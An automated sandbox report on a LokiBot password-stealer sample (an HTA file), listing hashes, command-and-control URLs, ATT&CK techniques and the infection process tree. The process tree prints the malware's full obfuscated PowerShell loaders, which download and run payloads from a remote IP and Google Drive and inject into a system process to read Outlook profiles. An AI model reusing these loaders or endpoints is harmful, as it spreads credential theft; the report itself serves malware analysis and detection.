lokibot | 5775dd79d6529e77182ceccb5f0a1d9d22d4884017df41dade409caf6471e48f

Analysis

max time kernel
143s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
30-10-2024 09:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

creatednewthingsformee.hta
Size

205KB
MD5

0b94188f0fe1baed9f97e0a69806b6e9
SHA1

65a871c11c36799a747b8b40154130415f6e6f84
SHA256

5775dd79d6529e77182ceccb5f0a1d9d22d4884017df41dade409caf6471e48f
SHA512

ad87371d82d5887377cc5882111f26849c6783427bf15c2fe235ca7570898d8937032e445e377acfe6d495ba01a0cad558fd0a3ecb23152b177ef5708639b75a
SSDEEP

96:43F975adf4WbLdfSWbmx0JnfXdfmdfvUWbEdfAQ:43F15Of4GRfSGmx0J1fqfvUGAfAQ

Score

10^/10

lokibot collection defense_evasion discovery execution spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Extracted

Family

lokibot

http://94.156.177.220/simple/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Lokibot family
lokibot

Blocklisted process makes network request 4 IoCs

flow	pid	Process
21	4348	pOwErshEll.ExE
28	2656	powershell.exe
30	2656	powershell.exe
46	2656	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1048	powershell.exe
2656	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
4348	pOwErshEll.ExE
3260	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	aspnet_regbrowsers.exe
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	aspnet_regbrowsers.exe
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	aspnet_regbrowsers.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
27	drive.google.com
28	drive.google.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2656 set thread context of 3624	2656	powershell.exe	106

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOwErshEll.ExE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	pOwErshEll.ExE

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4348	pOwErshEll.ExE
4348	pOwErshEll.ExE
3260	powershell.exe
3260	powershell.exe
1048	powershell.exe
1048	powershell.exe
2656	powershell.exe
2656	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	4348	pOwErshEll.ExE
Token: SeDebugPrivilege	3260	powershell.exe
Token: SeDebugPrivilege	1048	powershell.exe
Token: SeDebugPrivilege	2656	powershell.exe
Token: SeDebugPrivilege	3624	aspnet_regbrowsers.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 2816 wrote to memory of 4348	2816	mshta.exe	87
PID 2816 wrote to memory of 4348	2816	mshta.exe	87
PID 2816 wrote to memory of 4348	2816	mshta.exe	87
PID 4348 wrote to memory of 3260	4348	pOwErshEll.ExE	91
PID 4348 wrote to memory of 3260	4348	pOwErshEll.ExE	91
PID 4348 wrote to memory of 3260	4348	pOwErshEll.ExE	91
PID 4348 wrote to memory of 4148	4348	pOwErshEll.ExE	95
PID 4348 wrote to memory of 4148	4348	pOwErshEll.ExE	95
PID 4348 wrote to memory of 4148	4348	pOwErshEll.ExE	95
PID 4148 wrote to memory of 1504	4148	csc.exe	96
PID 4148 wrote to memory of 1504	4148	csc.exe	96
PID 4148 wrote to memory of 1504	4148	csc.exe	96
PID 4348 wrote to memory of 792	4348	pOwErshEll.ExE	99
PID 4348 wrote to memory of 792	4348	pOwErshEll.ExE	99
PID 4348 wrote to memory of 792	4348	pOwErshEll.ExE	99
PID 792 wrote to memory of 1048	792	WScript.exe	100
PID 792 wrote to memory of 1048	792	WScript.exe	100
PID 792 wrote to memory of 1048	792	WScript.exe	100
PID 1048 wrote to memory of 2656	1048	powershell.exe	102
PID 1048 wrote to memory of 2656	1048	powershell.exe	102
PID 1048 wrote to memory of 2656	1048	powershell.exe	102
PID 2656 wrote to memory of 3624	2656	powershell.exe	106
PID 2656 wrote to memory of 3624	2656	powershell.exe	106
PID 2656 wrote to memory of 3624	2656	powershell.exe	106
PID 2656 wrote to memory of 3624	2656	powershell.exe	106
PID 2656 wrote to memory of 3624	2656	powershell.exe	106
PID 2656 wrote to memory of 3624	2656	powershell.exe	106
PID 2656 wrote to memory of 3624	2656	powershell.exe	106
PID 2656 wrote to memory of 3624	2656	powershell.exe	106
PID 2656 wrote to memory of 3624	2656	powershell.exe	106

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	aspnet_regbrowsers.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	aspnet_regbrowsers.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\creatednewthingsformee.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2816
- C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE
  "C:\Windows\sYsteM32\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE" "pOweRshell -Ex bYPAss -noP -w 1 -c deVICEcREdEnTiaLDEPlOYmENt.eXe ; IeX($(iEX('[sYsTem.teXt.ENcoding]'+[ChAR]0X3A+[ChAR]0X3A+'utF8.geTstRInG([sYsTeM.CoNVeRt]'+[CHaR]0X3A+[char]0x3a+'fRoMBase64sTrinG('+[ChAR]0X22+'JEhReHJKU2ZXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlUkRFRkluaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHl2Q2FjT3NiUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxVEN2dHJKVElJcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHdUc0dkTE0sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXdMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAib1V1WXR5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpRFFLc1Z2b0pUUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkSFF4ckpTZlc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82NS9zZWV0aGViZXN0aHRpbmdzd2l0aG1ld2hpY2hnaXZlZ3JlYXRvdXRwdXRvZm1lZ29vZC50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdGh0aW5nc3dpdGhtZXdoaWNoZ2l2ZWdyZWF0b3V0cHV0b2ZtLnZiUyIsMCwwKTtTdGFSdC1TbGVFcCgzKTtzdEFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VldGhlYmVzdGh0aW5nc3dpdGhtZXdoaWNoZ2l2ZWdyZWF0b3V0cHV0b2ZtLnZiUyI='+[cHar]0X22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4348
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -noP -w 1 -c deVICEcREdEnTiaLDEPlOYmENt.eXe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3260
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iyodhvgw\iyodhvgw.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4148
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESED3E.tmp" "c:\Users\Admin\AppData\Local\Temp\iyodhvgw\CSCE0AA58A9C33943A698AE4C6BF124EBD.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1504
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebesthtingswithmewhichgivegreatoutputofm.vbS"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:792
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRTaEVMTElkWzFdKyRzaGVsTElkWzEzXSsneCcpICgoJ1M3RmltYWdlJysnVXJsID0gYkJIaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgYkJIO1M3RndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbicrJ3Q7UzdGaW1hZ2VCeXRlcyA9IFM3RndlYkNsaWVudC5Eb3dubG9hZERhJysndGEoUzdGaW1hJysnZ2VVcmwpO1M3RmltYWdlVGV4dCA9JysnIFtTeXN0ZW0uVGUnKyd4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nJysnKFM3RmltYWdlQnl0ZXMpO1M3RnN0YXJ0RmxhZyA9IGJCSDw8JysnQkFTRTY0XycrJ1NUQVJUPj5iQkg7UzdGZW5kRmxhZyA9IGInKydCSDw8QkFTRTY0X0VORD4+YkJIO1M3RnN0YXJ0SW5kZXggPSBTN0ZpbWFnZVRleHQuSW5kZXhPZihTN0ZzdGFydEZsYWcpO1M3RmVuZEluZGV4JysnID0gUzdGaW1hZ2VUZXh0LkluZGV4T2YoUzdGZW5kRmxhJysnZyk7UzdGc3RhcnRJbmRleCAtZ2UgJysnMCAtYW5kIFM3RmVuZEluZGV4IC1ndCBTN0ZzdCcrJ2FydEluZGV4O1M3RnN0YXJ0SW5kZXggKz0gUzdGJysnc3RhcnRGbGFnLkxlbmcnKyd0aDtTN0ZiYScrJ3NlNjRMZW5ndGggPSBTN0ZlbmRJbmRleCAtIFM3RnN0YXInKyd0SW5kZXg7UzdGYmFzZTY0Q29tbWFuZCA9IFM3RmltYWdlVGV4dC5TdWJzdHJpbmcoUzdGc3RhcnRJbmRleCwgUzdGYmFzZTY0TCcrJ2VuZ3RoKTsnKydTN0ZiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luICcrJyhTN0ZiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgQkRGIEZvckVhY2gtT2JqZWN0IHsgUzdGXyB9KVsnKyctJysnMS4nKycuLShTN0ZiYXNlNjRDb21tYW5kLkxlbmd0aCldO1M3RmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoUzdGYicrJ2FzZTY0UmV2ZXJzZWQpO1M3RmxvYWRlZEFzJysnc2VtJysnYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChTN0Zjb21tYScrJ25kJysnQnl0JysnZXMpO1M3RnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QoYkJIVkFJJysnYkJIKTtTN0Z2YWlNZXRob2QuSW52b2tlKFM3Rm51JysnbGwsIEAoYkJIdHh0LktMTExQTVMvNTYvMTUxLjg3MS42NC44OTEvLzpwdHRoYkJILCBiQkhkZXNhdGl2YWRvYkJILCBiQkhkZXNhdGl2YWRvYkInKydILCBiQkhkZXNhdGl2YWRvYkJILCBiQkhhc3BuZXRfcmVnYnJvd3NlcnNiQkgsIGJCSGRlc2F0aXZhZG9iQkgsIGJCSGRlc2F0aXZhZG9iQkgsYkJIZGVzYXRpdmFkb2JCSCxiQkhkZXNhdGl2YWRvJysnYkJILGJCSGRlc2F0aXZhZG8nKydiQkgsYkJIZGUnKydzYXRpdmFkb2JCSCxiQkhkZXNhdGl2YWRvYkJILGJCSDFiQkgsYkJIZGVzYXRpdmFkb2JCSCkpOycpLlJlUGxhY0UoJ0JERicsJ3wnKS5SZVBsYWNFKCdiQkgnLFtzdFJpbmddW2NoYXJdMzkpLlJlUGxhY0UoJ1M3RicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1048
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ShELLId[1]+$shelLId[13]+'x') (('S7Fimage'+'Url = bBHhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur bBH;S7FwebClient = New-Object System.Net.WebClien'+'t;S7FimageBytes = S7FwebClient.DownloadDa'+'ta(S7Fima'+'geUrl);S7FimageText ='+' [System.Te'+'xt.Encoding]::UTF8.GetString'+'(S7FimageBytes);S7FstartFlag = bBH<<'+'BASE64_'+'START>>bBH;S7FendFlag = b'+'BH<<BASE64_END>>bBH;S7FstartIndex = S7FimageText.IndexOf(S7FstartFlag);S7FendIndex'+' = S7FimageText.IndexOf(S7FendFla'+'g);S7FstartIndex -ge '+'0 -and S7FendIndex -gt S7Fst'+'artIndex;S7FstartIndex += S7F'+'startFlag.Leng'+'th;S7Fba'+'se64Length = S7FendIndex - S7Fstar'+'tIndex;S7Fbase64Command = S7FimageText.Substring(S7FstartIndex, S7Fbase64L'+'ength);'+'S7Fbase64Reversed = -jo'+'in '+'(S7Fbase64Command.ToCharArray() BDF ForEach-Object { S7F_ })['+'-'+'1.'+'.-(S7Fbase64Command.Length)];S7FcommandBytes = [System.Convert]::FromBase64String(S7Fb'+'ase64Reversed);S7FloadedAs'+'sem'+'bly = [System.Reflection.Assembly]::Load(S7Fcomma'+'nd'+'Byt'+'es);S7FvaiMethod = [dnlib.IO.Home]'+'.GetMethod(bBHVAI'+'bBH);S7FvaiMethod.Invoke(S7Fnu'+'ll, @(bBHtxt.KLLLPMS/56/151.871.64.891//:ptthbBH, bBHdesativadobBH, bBHdesativadobB'+'H, bBHdesativadobBH, bBHaspnet_regbrowsersbBH, bBHdesativadobBH, bBHdesativadobBH,bBHdesativadobBH,bBHdesativado'+'bBH,bBHdesativado'+'bBH,bBHde'+'sativadobBH,bBHdesativadobBH,bBH1bBH,bBHdesativadobBH));').RePlacE('BDF','|').RePlacE('bBH',[stRing][char]39).RePlacE('S7F','$'))"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2656
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
        6⤵
        Accesses Microsoft Outlook profiles
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:3624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOwErshEll.ExE.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
c05bfcec8659824d2e1b0707ff338249

SHA1
a6336201334da17c9444e026ffbc839f99d2269c

SHA256
8573d294a1777ac882dd7feca947c5ca81206f43d6a29831072ce7702515e3c7

SHA512
513e1a94c018e8a7bed8031459fd4623902211f68a77be3fbcb1268c9474878ad4daa39f1ec339404fe83eeac16fb6c0a742e59646ab23b6eb0b8f0b3c3ed65a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
8c48f9aa3c78d58172f3893ed3b85cf1

SHA1
58bb96b82329a320736bbe43d5604de73b431402

SHA256
42ad0a225f1559eee7ea9266e3c55c1f48e6f1f4861b08149344d9b751804fb6

SHA512
ce51c459dd28e2b10c62bd9fddc7eb706280bff0933231638256fae8e1839226c1ff79755c667b635d2d972a990d9137b4346dc7ff47be5f935f62d071bb88a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESED3E.tmp

Filesize
1KB

MD5
fd3212a26bad4c51013b3563695e261a

SHA1
7fcd658c6c56cd29bf7e7a4067ac0d963db794eb

SHA256
4c7efe63de94fbc88ca47b941a67952e0d6f1995706e7f01c223fe3b110841d1

SHA512
a935bf32648ddc0308195a5564f084a55c8652138f504d657508bd57a81448894f8612c132e7be813639d4862628c971bb4577dc507f4ab6cfe75a5c8ca65fbd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cbtbyfr5.hmi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\iyodhvgw\iyodhvgw.dll

Filesize
3KB

MD5
ed27133586c682be2cab624fb5f6b174

SHA1
ec541e16b5ee4d0fed44e589590c0dbdd9be4638

SHA256
3b5f7dc9a14af88ceaa346a7a96a34c59e37de44c76582d23198099b9a9f3769

SHA512
59feb93d996d6c0f01bd0852d55d8322b86d9a641f6f6e9d2dec7a35c575ee27b14215ad969997c04dd32d5a429fe95ef99bdcb425f561672ecfe535dc5e921e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4050598569-1597076380-177084960-1000\0f5007522459c86e95ffcc62f32308f1_cca0d105-8260-4611-8c12-bd85a7208b9f

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4050598569-1597076380-177084960-1000\0f5007522459c86e95ffcc62f32308f1_cca0d105-8260-4611-8c12-bd85a7208b9f

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\seethebesthtingswithmewhichgivegreatoutputofm.vbS

Filesize
137KB

MD5
4dd3d6eed0e1ade77fde299848078ef8

SHA1
75855bee75c0c52d00cad1897c381ffc6c706200

SHA256
9bff58b3dfe1955e923ed90e899ac419667de9e6c842753d68614fbf8f612305

SHA512
3c7907b390cedb7f619f1cb9d3aaa24c623a6083995be4a45690e5fd05982df6054e33d1d434cbcb725ad27003529112abb52138d4f5125bfc8680a786701e5d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iyodhvgw\CSCE0AA58A9C33943A698AE4C6BF124EBD.TMP

Filesize
652B

MD5
91fa68060f6b4a6e829cd3fb05a17ad1

SHA1
9990e4ff187f312b62dd192a957c651028690727

SHA256
420c6d3efaff9ec3fef63566ff0fd8725d39ca1d9d5f82ccccb27bc7c9321b99

SHA512
68f5508bc1c0b5a1a8acebd98a6f1ae7bf833a5227294cc137e0adf64147d5702325495a015fc35e64db6edd38195dd6b083aacae03bfe1591870872a88cb386

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iyodhvgw\iyodhvgw.0.cs

Filesize
487B

MD5
9b8f2dee116254910197a8801c205862

SHA1
c4fddb1f937921b75c5c988cdb3f459faa446d52

SHA256
5dc90823fdcadfdd6112440b46638cf1ab71285482a67d35e2bf187f68d39ee3

SHA512
00e292822b1e9e94fdf9d91a3edd5cc30f09b02bc6413dde3bb8d1941534637cb0832544f984ed65944e30e473a6820e6816841261efef0f519dab6a14ebf218

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iyodhvgw\iyodhvgw.cmdline

Filesize
369B

MD5
3a66066869441052b351520dd6280b12

SHA1
8b9423a7b6f4278c1f8b1f128c3d9e62a21b06b6

SHA256
019fbd085501902987ca21fdf49b1025c7cdd8578885e7cb3bc76838c9f1569f

SHA512
85bf7060cae472e6da803584a4fddbd4e2e73e342768ce7450070c7c657aa92ed40f95954721424f62de70db483947a246e6c0c4f1ebaa687b5f4889140515e5

Download Submit
memory/1048-88-0x0000000005D40000-0x0000000006094000-memory.dmp

Filesize
3.3MB

Download
memory/2656-104-0x0000000008070000-0x000000000810C000-memory.dmp

Filesize
624KB

Download
memory/2656-103-0x0000000007F10000-0x000000000806A000-memory.dmp

Filesize
1.4MB

Download
memory/3260-29-0x0000000006AC0000-0x0000000006AF2000-memory.dmp

Filesize
200KB

Download
memory/3260-40-0x0000000006040000-0x000000000605E000-memory.dmp

Filesize
120KB

Download
memory/3260-43-0x0000000006E10000-0x0000000006E2A000-memory.dmp

Filesize
104KB

Download
memory/3260-44-0x0000000006E70000-0x0000000006E7A000-memory.dmp

Filesize
40KB

Download
memory/3260-45-0x00000000070A0000-0x0000000007136000-memory.dmp

Filesize
600KB

Download
memory/3260-30-0x000000006D620000-0x000000006D66C000-memory.dmp

Filesize
304KB

Download
memory/3260-42-0x0000000007450000-0x0000000007ACA000-memory.dmp

Filesize
6.5MB

Download
memory/3260-48-0x0000000007010000-0x0000000007021000-memory.dmp

Filesize
68KB

Download
memory/3260-49-0x0000000007040000-0x000000000704E000-memory.dmp

Filesize
56KB

Download
memory/3260-50-0x0000000007050000-0x0000000007064000-memory.dmp

Filesize
80KB

Download
memory/3260-51-0x0000000007160000-0x000000000717A000-memory.dmp

Filesize
104KB

Download
memory/3260-52-0x0000000007090000-0x0000000007098000-memory.dmp

Filesize
32KB

Download
memory/3260-41-0x0000000006B00000-0x0000000006BA3000-memory.dmp

Filesize
652KB

Download
memory/3624-130-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/3624-138-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/3624-106-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/3624-105-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/4348-67-0x0000000006EE0000-0x0000000006EE8000-memory.dmp

Filesize
32KB

Download
memory/4348-4-0x0000000070D60000-0x0000000071510000-memory.dmp

Filesize
7.7MB

Download
memory/4348-74-0x0000000008BE0000-0x0000000009184000-memory.dmp

Filesize
5.6MB

Download
memory/4348-18-0x0000000006930000-0x000000000694E000-memory.dmp

Filesize
120KB

Download
memory/4348-17-0x0000000006480000-0x00000000067D4000-memory.dmp

Filesize
3.3MB

Download
memory/4348-16-0x00000000062C0000-0x0000000006326000-memory.dmp

Filesize
408KB

Download
memory/4348-81-0x0000000070D60000-0x0000000071510000-memory.dmp

Filesize
7.7MB

Download
memory/4348-6-0x0000000006250000-0x00000000062B6000-memory.dmp

Filesize
408KB

Download
memory/4348-5-0x00000000061B0000-0x00000000061D2000-memory.dmp

Filesize
136KB

Download
memory/4348-73-0x0000000007CF0000-0x0000000007D12000-memory.dmp

Filesize
136KB

Download
memory/4348-19-0x00000000069D0000-0x0000000006A1C000-memory.dmp

Filesize
304KB

Download
memory/4348-0-0x0000000070D6E000-0x0000000070D6F000-memory.dmp

Filesize
4KB

Download
memory/4348-3-0x0000000005A40000-0x0000000006068000-memory.dmp

Filesize
6.2MB

Download
